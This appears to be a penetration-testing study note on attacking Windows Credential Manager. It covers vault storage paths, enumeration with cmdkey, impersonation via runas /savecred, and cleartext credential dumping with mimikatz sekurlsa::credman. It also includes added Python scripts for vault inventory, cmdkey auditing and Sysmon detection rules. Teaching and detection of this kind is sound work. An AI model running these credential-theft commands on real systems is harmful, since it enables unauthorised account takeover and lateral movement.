# Attacking Windows Credential Manager

### What is Credential Manager?

**Credential Manager** is a built-in Windows feature (since Server 2008 R2 / Windows 7) that allows users and applications to securely store credentials for other systems and websites. It is the user-facing API; the actual encrypted stores are called **Credential Lockers** (formerly Windows Vaults).

#### Two types of stored credentials:

| Type                    | Description                                                                              |
| ----------------------- | ---------------------------------------------------------------------------------------- |
| **Web Credentials**     | Credentials for websites and online accounts. Used by Internet Explorer and legacy Edge. |
| **Windows Credentials** | Login tokens for services (OneDrive, domain users, network shares, SMB, etc.)            |

***

### Where Credentials Are Stored on Disk

```
%UserProfile%\AppData\Local\Microsoft\Vault\
%UserProfile%\AppData\Local\Microsoft\Credentials\
%UserProfile%\AppData\Roaming\Microsoft\Vault\
%ProgramData%\Microsoft\Vault\
%SystemRoot%\System32\config\systemprofile\AppData\Roaming\Microsoft\Vault\
```

Each vault folder contains a `Policy.vpol` file holding **AES-128 or AES-256 keys** protected by **DPAPI**. These AES keys encrypt the credentials.

> **Note:** Newer Windows versions use **Credential Guard** to further protect DPAPI master keys inside Virtualization-based Security (VBS) memory enclaves.
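For triage, it helps to know which of these locations actually hold anything for a given profile before any decryption question comes up. The following Python script is an added example, not code from the page or from any of the tools it mentions: it walks the profile-relative vault and credential folders listed above, classifies each file by role (the `Policy.vpol` key file, `*.vcrd` vault entries, and the hex-named DPAPI blobs in `Credentials\`), and returns counts. The profile tree it inspects is constructed in a temporary directory with dummy bytes; the GUID folder name and file names are placeholders, not real identifiers.

```python
"""Inventory Credential Manager storage locations under a user profile.

Added example for DFIR triage: it records which of the page's on-disk vault
locations exist for a profile and what they hold, without decrypting anything.
The profile tree it inspects in the demo is constructed in a temp directory.
"""
import tempfile
from pathlib import Path
from typing import Dict, List

# Profile-relative locations from the page, as path parts so the walk also
# runs on a non-Windows analysis host against a mounted or copied profile.
USER_VAULT_DIRS = (
    ("AppData", "Local", "Microsoft", "Vault"),
    ("AppData", "Local", "Microsoft", "Credentials"),
    ("AppData", "Roaming", "Microsoft", "Vault"),
)


def classify(path: Path) -> str:
    """Label a file by the role it plays inside a vault or credential folder."""
    if path.name.lower() == "policy.vpol":
        return "vault policy (DPAPI-protected AES key)"
    if path.suffix.lower() == ".vcrd":
        return "vault credential (AES-encrypted with the policy key)"
    # Credentials\ holds hex-named DPAPI blobs; anything else lands here too
    return "DPAPI credential blob"


def inventory_vault_dirs(profile_root: Path) -> Dict[str, List[Dict[str, object]]]:
    """Return {location: [file records]} for every vault location under one profile.

    Locations that do not exist map to an empty list, so the caller can tell
    "no vault" apart from "vault present but empty".
    """
    report: Dict[str, List[Dict[str, object]]] = {}
    for parts in USER_VAULT_DIRS:
        folder = profile_root.joinpath(*parts)
        records: List[Dict[str, object]] = []
        if folder.is_dir():
            for file in sorted(p for p in folder.rglob("*") if p.is_file()):
                records.append({
                    "path": file.relative_to(profile_root).as_posix(),
                    "size": file.stat().st_size,
                    "kind": classify(file),
                })
        report["\\".join(parts)] = records
    return report


def count_by_kind(report: Dict[str, List[Dict[str, object]]]) -> Dict[str, int]:
    """Aggregate the inventory into a count per file role."""
    counts: Dict[str, int] = {}
    for records in report.values():
        for rec in records:
            kind = str(rec["kind"])
            counts[kind] = counts.get(kind, 0) + 1
    return counts


def build_constructed_profile() -> Path:
    """Create a throwaway profile tree mimicking the layout; contents are dummy bytes."""
    root = Path(tempfile.mkdtemp(prefix="profile_"))
    # Vaults live in a GUID-named subfolder; this GUID is a constructed placeholder.
    vault = root.joinpath("AppData", "Local", "Microsoft", "Vault",
                          "11111111-2222-3333-4444-555555555555")
    vault.mkdir(parents=True)
    (vault / "Policy.vpol").write_bytes(b"\x00" * 32)
    (vault / "66666666-7777-8888-9999-AAAAAAAAAAAA.vcrd").write_bytes(b"\x00" * 64)
    creds = root.joinpath("AppData", "Local", "Microsoft", "Credentials")
    creds.mkdir(parents=True)
    (creds / "0123456789ABCDEF0123456789ABCDEF").write_bytes(b"\x00" * 48)
    return root


if __name__ == "__main__":
    demo_root = build_constructed_profile()
    for location, records in inventory_vault_dirs(demo_root).items():
        print(f"{location}: {len(records)} file(s)")
        for rec in records:
            print(f"  {rec['path']}  {rec['size']}B  {rec['kind']}")
```

On a real case you would point `inventory_vault_dirs` at a copied or mounted profile root rather than the constructed one; the `%ProgramData%` and `systemprofile` vaults from the list above are system-wide and would need a second root.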

***

### Enumerating Stored Credentials

#### cmdkey (built-in, no tools needed)

```cmd
cmdkey /list
```

**Example output:**

```
Currently stored credentials:

    Target: WindowsLive:target=virtualapp/didlogical
    Type: Generic
    User: 02hejubrtyqjrkfi
    Local machine persistence

    Target: Domain:interactive=SRV01\mcharles
    Type: Domain Password
    User: SRV01\mcharles
```

#### Reading the output:

| Field           | Meaning                                                                    |
| --------------- | -------------------------------------------------------------------------- |
| **Target**      | The resource/account this credential is for (hostname, domain, special ID) |
| **Type**        | `Generic` = general use, `Domain Password` = domain logon credential       |
| **User**        | Account associated with the credential                                     |
| **Persistence** | `Local machine persistence` = survives reboots                             |

> **Ignore:** `virtualapp/didlogical` is an internal Microsoft account/Windows Live ID — not useful for attacks.

> **Focus on:** `Domain:interactive=SRV01\mcharles` — a domain credential saved for interactive logon. This is actionable.
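Reading this output by eye works for one host; across a fleet an audit wants it parsed. The Python below is an added example, not from the page or from Microsoft: it turns `cmdkey /list` text into records, separates the `Target` into scheme (`Domain`, `WindowsLive`, ...), kind (`interactive` versus `target`) and resource, drops the `virtualapp/didlogical` noise, and rates each remaining entry by how reusable it is. The sample output is constructed: the first two entries mirror the page, the third (a `Domain:target=` credential for a file server, user `INLANEFREIGHT\svc_backup`) is an assumed extra entry of the kind `cmdkey` also prints.

```python
"""Parse `cmdkey /list` output and report which saved credentials matter.

Added example: an audit helper that turns the text cmdkey prints into records
and flags the saved domain logons that `runas /savecred` would consume silently.
The sample output is constructed from the page's example plus one extra entry.
"""
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample output. The first two entries mirror the page; the third
# (a saved credential for a file server) is an assumed extra entry.
SAMPLE_CMDKEY_OUTPUT = """\
Currently stored credentials:

    Target: WindowsLive:target=virtualapp/didlogical
    Type: Generic
    User: 02hejubrtyqjrkfi
    Local machine persistence

    Target: Domain:interactive=SRV01\\mcharles
    Type: Domain Password
    User: SRV01\\mcharles

    Target: Domain:target=FILESRV01
    Type: Domain Password
    User: INLANEFREIGHT\\svc_backup
    Local machine persistence
"""

# Internal Microsoft identities that appear on most hosts and carry no reusable logon.
NOISE_RESOURCES = {"virtualapp/didlogical"}


@dataclass
class StoredCredential:
    target: str
    cred_type: str
    user: str
    persistent: bool

    @property
    def scheme(self) -> str:
        """Prefix before the first colon: Domain, WindowsLive, LegacyGeneric, ..."""
        return self.target.split(":", 1)[0]

    @property
    def kind(self) -> str:
        """'interactive' (saved logon) or 'target' (credential for a named resource)."""
        rest = self.target.split(":", 1)[1] if ":" in self.target else ""
        return rest.split("=", 1)[0]

    @property
    def resource(self) -> str:
        return self.target.split("=", 1)[1] if "=" in self.target else self.target


def parse_cmdkey_list(text: str) -> List[StoredCredential]:
    """Group cmdkey's indented lines into one record per 'Target:' block."""
    entries: List[StoredCredential] = []
    current: Optional[dict] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Target:"):
            if current is not None:
                entries.append(StoredCredential(**current))
            current = {"target": line.split(":", 1)[1].strip(), "cred_type": "",
                       "user": "", "persistent": False}
        elif current is None:
            continue  # header text such as "Currently stored credentials:" or "* NONE *"
        elif line.startswith("Type:"):
            current["cred_type"] = line.split(":", 1)[1].strip()
        elif line.startswith("User:"):
            current["user"] = line.split(":", 1)[1].strip()
        elif line == "Local machine persistence":
            current["persistent"] = True
    if current is not None:
        entries.append(StoredCredential(**current))
    return entries


def is_noise(cred: StoredCredential) -> bool:
    return cred.resource in NOISE_RESOURCES


def is_savecred_candidate(cred: StoredCredential) -> bool:
    """A Domain Password saved for interactive logon is what runas /savecred reuses."""
    return (cred.scheme == "Domain" and cred.kind == "interactive"
            and cred.cred_type == "Domain Password")


def audit(text: str) -> List[dict]:
    """Return findings for an audit report, most reusable first."""
    findings = []
    for cred in parse_cmdkey_list(text):
        if is_noise(cred):
            continue
        if is_savecred_candidate(cred):
            severity = "high"    # usable as that account with no password prompt
        elif cred.cred_type == "Domain Password":
            severity = "medium"  # domain cred for one resource, still a DPAPI-protected secret
        else:
            severity = "low"
        findings.append({"severity": severity, "user": cred.user,
                         "target": cred.target, "persistent": cred.persistent})
    order = {"high": 0, "medium": 1, "low": 2}
    return sorted(findings, key=lambda f: order[f["severity"]])


if __name__ == "__main__":
    for f in audit(SAMPLE_CMDKEY_OUTPUT):
        print(f"[{f['severity']:6}] {f['user']:28} {f['target']}  persistent={f['persistent']}")
```

Feed it `cmdkey /list` output collected per user (the store is per profile, so run it in each user's context); a `high` finding on a shared or jump host is the condition the next section turns into a shell.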

***

### Abusing Stored Credentials — runas /savecred

If you find a `Domain:interactive` credential via `cmdkey`, you can impersonate that user **without knowing their password**:

```cmd
runas /savecred /user:SRV01\mcharles cmd
```

* Opens a new `cmd.exe` session running as `mcharles`
* Uses the saved credential silently — no password prompt
* Verify with `whoami` in the new shell

> This is essentially free lateral movement if a privileged user has their credentials stored on a machine you've compromised.

***

### Exporting the Vault (for Reference)

```cmd
rundll32 keymgr.dll,KRShowKeyMgr
```

Opens the **Stored User Names and Passwords** GUI. Vaults can be exported to `.crd` files (encrypted with a user-supplied password) and imported on other Windows systems.
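Both of the commands in the last two sections (`runas /savecred ...` and `rundll32 keymgr.dll,KRShowKeyMgr`) show up verbatim in process-creation telemetry, which is the cheapest place to catch them. The Python below is an added detection example, not from the page or any vendor: it runs three command-line rules over Sysmon Event ID 1-style records, rating `runas /savecred` high, the Key Manager GUI medium, and `cmdkey /list` low because administrators also run it. It normalises case and whitespace, and prefers Sysmon's `OriginalFileName` over the on-disk image name so a renamed copy of `runas.exe` still matches. Every event in the sample set is constructed, including the user names and the renamed-binary path.

```python
"""Flag process-creation events tied to saved-credential abuse.

Added detection example (not from the page or any vendor): simple rules over
Sysmon Event ID 1-style records for the two commands the page shows,
`runas /savecred` and `rundll32 keymgr.dll,KRShowKeyMgr`, plus `cmdkey /list`
recon. All sample events below are constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Alert:
    rule: str
    severity: str
    user: str
    command_line: str


# (rule name, severity, expected image basename, pattern over the normalised command line)
RULES: List[Tuple[str, str, str, "re.Pattern"]] = [
    # runas.exe consuming a saved credential: no password prompt, so a strong signal
    ("runas_savecred", "high", "runas.exe", re.compile(r"(?:^|\s)/savecred(?:\s|$)")),
    # Stored User Names and Passwords GUI, the export path described on the page
    ("keymgr_gui_opened", "medium", "rundll32.exe", re.compile(r"keymgr\.dll\s*,\s*krshowkeymgr")),
    # cmdkey /list is also routine admin use; keep it low and correlate with the others
    ("cmdkey_enumeration", "low", "cmdkey.exe", re.compile(r"(?:^|\s)/list(?:\s|$)")),
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _normalize(cmd: str) -> str:
    # Collapse whitespace and lowercase so `/SaveCred` and `/savecred` match alike
    return re.sub(r"\s+", " ", cmd).strip().lower()


def detect(events: List[Dict[str, str]]) -> List[Alert]:
    """Apply every rule to every event; returns alerts in event order."""
    alerts: List[Alert] = []
    for ev in events:
        # Prefer the PE header name Sysmon records, so renaming runas.exe does not evade the rule
        image = _basename(ev.get("OriginalFileName") or ev.get("Image", ""))
        cmd = _normalize(ev.get("CommandLine", ""))
        for rule, severity, want_image, pattern in RULES:
            if image == want_image and pattern.search(cmd):
                alerts.append(Alert(rule, severity, ev.get("User", "<unknown>"),
                                    ev.get("CommandLine", "")))
    return alerts


# Constructed sample events (Sysmon Event ID 1 fields, abbreviated).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\cmdkey.exe", "CommandLine": "cmdkey  /list",
     "User": r"SRV01\wley", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\runas.exe",
     "CommandLine": r"runas /SaveCred /user:SRV01\mcharles cmd",
     "User": r"SRV01\wley", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32 keymgr.dll,KRShowKeyMgr",
     "User": r"SRV01\wley", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # Benign: runas without /savecred prompts for a password and is not flagged
    {"Image": r"C:\Windows\System32\runas.exe",
     "CommandLine": r"runas /user:SRV01\mcharles cmd",
     "User": r"SRV01\helpdesk", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # Renamed copy of runas.exe: image name differs, OriginalFileName still says RUNAS.EXE
    {"Image": r"C:\Users\Public\svc.exe", "OriginalFileName": "RUNAS.EXE",
     "CommandLine": r"svc.exe /savecred /user:SRV01\mcharles cmd",
     "User": r"SRV01\wley", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe",
     "User": r"SRV01\wley", "ParentImage": r"C:\Windows\explorer.exe"},
]


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.severity:6}] {a.rule:20} {a.user:16} {a.command_line}")
```

The low-severity `cmdkey /list` hit is worth keeping only for correlation: the same user enumerating stored credentials and then launching `runas /savecred` within minutes is the sequence the page describes, and that pairing is what should page someone.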

***

### Extracting Credentials with Mimikatz

Mimikatz can attack Credential Manager credentials in two ways:

| Approach                   | Mimikatz Module | How                                              |
| -------------------------- | --------------- | ------------------------------------------------ |
| Dump from LSASS memory     | `sekurlsa`      | Reads creds cached in the LSASS process          |
| Manually decrypt from disk | `dpapi`         | Uses extracted DPAPI keys to decrypt vault files |

#### Method — sekurlsa::credman

```
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::credman
```

**Example output:**

```
User Name : mcharles
Domain    : SRV01
        credman :
         [00000000]
         * Username : mcharles@inlanefreight.local
         * Domain   : onedrive.live.com
         * Password : <CLEARTEXT>
```

`sekurlsa::credman` reads Credential Manager entries directly from LSASS memory — bypassing the on-disk encryption entirely. If the user has an active session, cleartext credentials may be present.

***

### Other Tools

| Tool           | Notes                                                                         |
| -------------- | ----------------------------------------------------------------------------- |
| **SharpDPAPI** | .NET tool for DPAPI decryption; can target vault files directly               |
| **LaZagne**    | Multi-platform credential harvester; covers browsers, Windows creds, and more |
| **DonPAPI**    | Remote DPAPI decryption; useful for lateral movement without touching disk    |

***

### Key points

* **cmdkey /list** is always your first step — zero tools required, built-in to Windows.
* **runas /savecred** is the fast win: if a domain admin's credential is saved, you get their shell for free.
* **Credential Manager uses DPAPI** for encryption — this is why DPAPI masterkeys extracted from LSASS are so valuable. One masterkey can decrypt the entire vault.
* **sekurlsa::credman vs dpapi module:** `sekurlsa` reads from live LSASS memory (requires active session); `dpapi` decrypts from disk files (requires masterkey). Both end up at the same place.
* **Credential Guard** is the modern defense — if enabled, DPAPI masterkeys are in a VBS enclave and cannot be extracted from LSASS even as SYSTEM. Worth noting during reporting.
* `virtualapp/didlogical` appearing in cmdkey output = noise, skip it.

